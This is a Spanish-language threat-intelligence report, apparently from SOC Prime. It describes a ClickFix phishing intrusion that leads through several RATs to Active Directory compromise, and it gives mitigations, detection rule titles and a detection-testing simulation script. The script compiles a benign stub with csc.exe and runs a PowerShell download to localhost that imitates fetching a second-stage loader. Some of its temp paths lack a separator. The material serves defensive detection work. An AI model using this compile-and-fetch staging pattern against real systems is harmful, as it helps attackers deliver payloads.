SOC Prime Bias: Critical

17 Aug 2026 07:03 UTC

SpaceX1337 ClickFix conduce a un compromiso de AD manual

Author Photo
SOC Prime Team linkedin icon Seguir
SpaceX1337 ClickFix conduce a un compromiso de AD manual
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumen

Un adversario utilizó un señuelo de phishing ClickFix para desplegar el RAT SpaceX1337, seguido de una infección en múltiples etapas que involucra RATs estándar como NetSupport, AsyncRAT y Remus. La intrusión progresó desde el robo automatizado de credenciales hacia una actividad interactiva con manos en el teclado dirigida al Active Directory. El atacante finalmente intentó el movimiento lateral hacia un controlador de dominio y el relleno de credenciales contra un portal VPN.

Investigación

La intrusión fue capturada dentro de una honeynet de Active Directory completamente instrumentada, proporcionando visibilidad de extremo a extremo a través de telemetría de EDR, Zeek y Suricata. Los investigadores rastrearon la actividad desde el descargador inicial de PowerShell a través de un amplio reconocimiento ADSI/LDAP y movimiento lateral sobre SMB. La investigación identificó claramente la transición de la ejecución automática de malware a la interacción directa por un operador humano.

Mitigación

Las organizaciones deben aplicar controles estrictos de ejecución de PowerShell y monitorear las relaciones de proceso padre-hijo sospechosas, incluyendo explorer.exe generando PowerShell. Los equipos de seguridad deben detectar la compilación en el host a través de csc.exe y el abuso de LOLBins como certutil or bitsadmin para descargas externas. El Active Directory también debe ser reforzado eliminando datos sensibles de los atributos LDAP y monitoreando consultas LDAP anómalas.

Respuesta

Si se detecta actividad sospechosa, los respondedores de incidentes deben aislar los puntos finales afectados y revocar las credenciales potencialmente comprometidas de cuentas de servicio y administradores de dominio. Las investigaciones deben priorizar la identificación de múltiples familias de RAT y verificar tareas programadas no autorizadas o modificaciones en el registro. Los registros de VPN también deben revisarse en busca de intentos de relleno de credenciales provenientes de infraestructura maliciosa conocida.

Flujo de Ataque

Detecciones

Ejecución de Python desde carpetas sospechosas (a través de cmdline)

Equipo SOC Prime
13 Ago 2026

Entrada Suspicious RunMRU Con Semántica LOLBin (a través de registry_event)

Equipo SOC Prime
13 Ago 2026

Ejecución de comandos en un host remoto usando la Gestión Remota de Windows (a través de cmdline)

Equipo SOC Prime
13 Ago 2026

Posible Enumeración/Manipulación de Cuentas o Grupos (a través de cmdline)

Equipo SOC Prime
13 Ago 2026

Descubrimiento Sospchoso de Confianzas de Dominio (a través de cmdline)

Equipo SOC Prime
13 Ago 2026

Posible Descubrimiento de Configuración de Red del Sistema (a través de cmdline)

Equipo SOC Prime
13 Ago 2026

Ejecutable Sospechoso Conteniendo Solo Números En el Nombre (a través de cmdline)

Equipo SOC Prime
13 Ago 2026

LOLBAS Schtasks (a través de cmdline)

Equipo SOC Prime
13 Ago 2026

Uso de Certutil para Codificación de Datos y Operaciones de Certificado (a través de cmdline)

Equipo SOC Prime
13 Ago 2026

LOLBAS Bitsadmin (a través de cmdline)

Equipo SOC Prime
13 Ago 2026

Posible Vaciamiento de SAM/SYSTEM/SECURITY (a través de cmdline)

Equipo SOC Prime
13 Ago 2026

Llamada a Métodos Sospechosos .NET desde Powershell (a través de powershell)

Equipo SOC Prime
13 Ago 2026

Comunicación de Dominio Sospechosa Trycloudflare (a través de dns)

Equipo SOC Prime
13 Ago 2026

Intento de Comunicaciones con Dominio para Búsqueda de IP (a través de dns)

Equipo SOC Prime
13 Ago 2026

IOCs (HashSha256) para detectar: Desde ClickFix SpaceX1337 hasta el Ataque AD con Manos en el Teclado

Reglas AI de SOC Prime
13 Ago 2026

IOCs (HashMd5) para detectar: Desde ClickFix SpaceX1337 hasta el Ataque AD con Manos en el Teclado

Reglas AI de SOC Prime
13 Ago 2026

IOCs (SourceIP) para detectar: Desde ClickFix SpaceX1337 hasta el Ataque AD con Manos en el Teclado

Reglas AI de SOC Prime
13 Ago 2026

IOCs (DestinationIP) para detectar: Desde ClickFix SpaceX1337 hasta el Ataque AD con Manos en el Teclado

Reglas AI de SOC Prime
13 Ago 2026

Regla Sigma de Alta Fidelidad para la Comunicación SpaceX1337 y AdaptixC2 [Conexión de Red de Windows]

Reglas AI de SOC Prime
13 Ago 2026

Detección de Compilación de Beacon AdaptixC2 y Cargador de PowerShell [Creación de Proceso de Windows]

Reglas AI de SOC Prime
13 Ago 2026

Ejecución de Simulación

Requisito previo: La Comprobación de Telemetría y Línea Base Pre-vuelo debe haber pasado.

Justificación: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente los TTPs identificados y apuntar a generar la telemetría exacta esperada por la lógica de detección. Ejemplos abstractos o no relacionados llevarán a un diagnóstico erróneo.

  • Narrativa del Ataque y Comandos: Un adversario ha ganado acceso inicial a través de un enlace de phishing. Para evitar llevar un .exe malicioso conocido al disco, dejan caer un pequeño .cs archivo fuente. Luego invocan csc.exe para compilar este fuente en un ejecutable funcional de Windows (svc.exe) ubicado en el %TEMP% directorio. Inmediatamente después de la compilación, el atacante usa PowerShell para obtener un cargador de segunda etapa desde un servidor C2 remoto (simulado a través de un oyente local) usando el iwr (Invoke-WebRequest) alias, guardándolo en la carpeta temporal para completar el proceso de puesta en escena.

  • Script de Prueba de Regresión:

    # 1. Crear un archivo fuente C# falso para simular la fuente AdaptixC2
    $csFile = "$env:TEMPsvc.cs"
    $exeFile = "$env:TEMPsvc.exe"
    $sourceCode = @"
    using System;
    namespace MimicC2 {
        class Program {
            static void Main() { Console.WriteLine("Simulated Beacon"); }
        }
    }
    "@
    $sourceCode | Out-File -FilePath $csFile -Encoding ascii
    
    # 2. Simular la compilación csc.exe (Activa selection_csc)
    # Nota: Utilizamos las banderas exactas especificadas en la lógica de detección
    Start-Process "csc.exe" -ArgumentList "/target:winexe", "/out:$env:TEMPsvc.exe", "$env:TEMPsvc.cs" -Wait
    
    # 3. Simular la descarga de PowerShell (Activa selection_powershell)
    # Usamos 'iwr' y la ruta específica de OutFile para coincidir con la lógica
    # Usando una URL inexistente para evitar tráfico de red real, pero la línea de comandos coincidirá
    powershell.exe -Command "iwr -Uri 'http://127.0.0.1' -OutFile `"$env:TEMPx.ps1`""
  • Comandos de Limpieza:

    Remove-Item -Path "$env:TEMPsvc.cs" -Force -ErrorAction SilentlyContinue
    Remove-Item -Path "$env:TEMPsvc.exe" -Force -ErrorAction SilentlyContinue
    Remove-Item -Path "$env:TEMPx.ps1" -Force -ErrorAction SilentlyContinue